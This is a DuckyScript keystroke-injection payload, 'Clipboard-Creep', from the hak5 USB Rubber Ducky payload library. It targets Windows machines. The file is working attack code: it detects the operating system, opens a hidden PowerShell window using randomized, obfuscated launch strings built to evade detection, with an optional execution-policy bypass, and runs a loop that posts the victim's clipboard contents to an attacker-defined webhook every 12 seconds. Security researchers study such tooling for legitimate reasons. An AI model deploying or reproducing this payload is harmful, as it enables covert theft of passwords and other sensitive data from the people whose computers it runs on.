Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/exfiltration/ClipBoard-Creep/payload.txt
2968 views
1
REM       Clipboard-Creep

2
REM       Version 1.0

3
REM       OS: Windows

4
REM       Author: 0i41E

5
REM       Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum

6
REM       This payload aims on the targets clipboard. Define a webhook plug in your payload and observe the clipboard content on your catching server.

7
REM       Based on Clipboard-Creep.ps1 - https://github.com/0i41E/ClipBoard-Creep

8


9


10
EXTENSION PASSIVE_WINDOWS_DETECT

11
    REM VERSION 1.1

12
    REM AUTHOR: Korben

13


14
    REM_BLOCK DOCUMENTATION

15
        Windows fully passive OS Detection and passive Detect Ready

16
        Includes its own passive detect ready.

17
        Does not require additional extensions.

18


19
        USAGE:

20
            Extension runs inline (here)

21
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic

22
            boot delay

23
            $_OS will be set to WINDOWS or NOT_WINDOWS

24
            See end of payload for usage within payload

25
    END_REM

26


27
    REM CONFIGURATION:

28
    DEFINE #MAX_WAIT 150

29
    DEFINE #CHECK_INTERVAL 20

30
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2

31
    DEFINE #NOT_WINDOWS 7

32


33
    $_OS = #NOT_WINDOWS

34


35
    VAR $MAX_TRIES = #MAX_WAIT

36
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))

37
        DELAY #CHECK_INTERVAL

38
        $MAX_TRIES = ($MAX_TRIES - 1)

39
    END_WHILE

40
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN

41
        $_OS = WINDOWS

42
    END_IF

43


44
    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION

45
        IF ($_OS == WINDOWS) THEN

46
            STRING HELLO WINDOWS!

47
        ELSE

48
            STRING HELLO WORLD!

49
        END_IF

50
    END_REM

51
END_EXTENSION

52


53
EXTENSION EXTENSION Rolling_Powershell_Execution

54
    REM VERSION 1.0

55
    REM Author: 0i41E

56
    REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek

57
    REM Requirements: PayloadStudio v.1.3 minimum

58
    REM Starts Powershell in uncommon ways to avoid basic detection

59
    REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection.

60


61
    REM CONFIGURATION:

62
    REM Add ExecutionPolicy bypass

63
    DEFINE #EXECUTIONPOLICY FALSE

64
    DEFINE #DELAY 500

65


66
    $_RANDOM_MIN = 1

67
    $_RANDOM_MAX = 16

68
    VAR $RANDOM_PS = $_RANDOM_INT

69
    FUNCTION Rolling_Powershell_Execution()

70
        IF ($RANDOM_PS == 1) THEN

71
            STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid"

72
        ELSE IF ($RANDOM_PS == 2) THEN

73
            STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi"

74
        ELSE IF ($RANDOM_PS == 3) THEN

75
            STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi"

76
        ELSE IF ($RANDOM_PS == 4) THEN

77
            STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H"

78
        ELSE IF ($RANDOM_PS == 5) THEN

79
            STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi"

80
        ELSE IF ($RANDOM_PS == 6) THEN

81
            STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD"

82
        ELSE IF ($RANDOM_PS == 7) THEN

83
            STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi"

84
        ELSE IF ($RANDOM_PS == 8) THEN

85
            STRING powershell -NoPro -noninT -win h

86
        ELSE IF ($RANDOM_PS == 9) THEN

87
            STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD"

88
        ELSE IF ($RANDOM_PS == 2) THEN

89
            STRING powershell.exe -NoP -nOni -W h

90
        ELSE IF ($RANDOM_PS == 10) THEN

91
            STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H"

92
        ELSE IF ($RANDOM_PS == 11) THEN

93
            STRING powershell -nopr -noninT -W HiddEn

94
        ELSE IF ($RANDOM_PS == 12) THEN

95
            STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi"

96
        ELSE IF ($RANDOM_PS == 13) THEN

97
            STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h"

98
        ELSE IF ($RANDOM_PS == 14) THEN

99
            STRING powershell -noproF -noni -W Hi

100
        ELSE IF ($RANDOM_PS == 15) THEN

101
            STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi"

102
        ELSE ($RANDOM_PS == 16) THEN

103
            STRING powershell.exe -noP -nOnI -windo H

104
        END_IF

105


106


107
    IF_DEFINED_TRUE #EXECUTIONPOLICY

108
        SPACE

109
        IF (($RANDOM_PS % 2) == 0) THEN

110
            STRING -ep ByPasS

111
        ELSE IF (($RANDOM_PS % 5) == 0) THEN

112
            STRING -exec bypass

113
        ELSE IF (($RANDOM_PS % 7) == 0) THEN

114
            STRING -exeC byPasS

115
        ELSE IF (($RANDOM_PS % 10) == 0) THEN

116
            STRING -exEcUtionPoL bYpaSs

117
        ELSE IF (($RANDOM_PS % 12) == 0) THEN

118
            STRING -exEcUtion bYPaSs

119
        ELSE

120
            STRING -eP BYPaSs

121
        END_IF

122
    END_IF_DEFINED

123
    ENTER

124
    DELAY #DELAY

125
    END_FUNCTION

126
    REM EXAMPLE USAGE AFTER EXTENSION

127
    REM DELAY 2000

128
    REM GUI r

129
    REM DELAY 2000

130
    REM Rolling_Powershell_Execution()

131
END_EXTENSION

132


133
EXTENSION Detect_Finished

134
    REM VERSION 1.0

135
    REM AUTHOR: 0i41E

136


137
    REM_BLOCK DOCUMENTATION

138
        USAGE:

139
            Use the function Detect_Finished() to signal the finished execution of your payload.

140
    END_REM

141


142
    REM CONFIGURATION:

143
    DEFINE #PAUSE 150

144
    FUNCTION Detect_Finished()

145
        IF ($_CAPSLOCK_ON == FALSE)

146
            CAPSLOCK

147
            DELAY #PAUSE

148
            CAPSLOCK

149
            DELAY #PAUSE

150
            CAPSLOCK

151
            DELAY #PAUSE

152
            CAPSLOCK

153
            ATTACKMODE OFF

154
        ELSE IF

155
            CAPSLOCK

156
            DELAY #PAUSE

157
            CAPSLOCK

158
            DELAY #PAUSE

159
            CAPSLOCK

160
            ATTACKMODE OFF

161
        END_IF

162
    END_FUNCTION

163
END_EXTENSION

164


165


166
REM Define URL of your catching webhook

167
DEFINE #HOOK "https://example.com/"

168
REM Define the pause between calls to your webhook. 

169
DEFINE #CALLBACK_DELAY 12

170


171
IF ($_OS == WINDOWS) THEN

172
    GUI r

173
    DELAY 1000

174
    REM randomized and obfuscated way to start powershell

175
    Rolling_Powershell_Execution()

176
    STRINGLN_POWERSHELL

177
    $e = $null

178
    while ($true) 

179
    {

180
        $c = Get-Clipboard

181
        if ($c) 

182
        {

183
            if ($c -ne $e)

184
            {

185
                $o = "Clipboard content: $c"

186
                irm -Uri #HOOK -Method POST -Body $o

187
            } else 

188
            {

189
                $o = "Clipboard content hasn't changed"

190
                irm -Uri #HOOK -Method POST -Body $o

191
            }

192
            $e = $c

193
            } else 

194
            {

195
            $o = "Clipboard is empty"

196
            irm -Uri #HOOK -Method POST -Body $o

197
        }

198
        sleep -s #CALLBACK_DELAY

199
    }

200
    END_STRINGLN

201
    ENTER

202
    DELAY 250

203
    Detect_Finished()

204
ELSE

205
    ATTACKMODE OFF

206
END_IF

207


208


209


210


211


212


213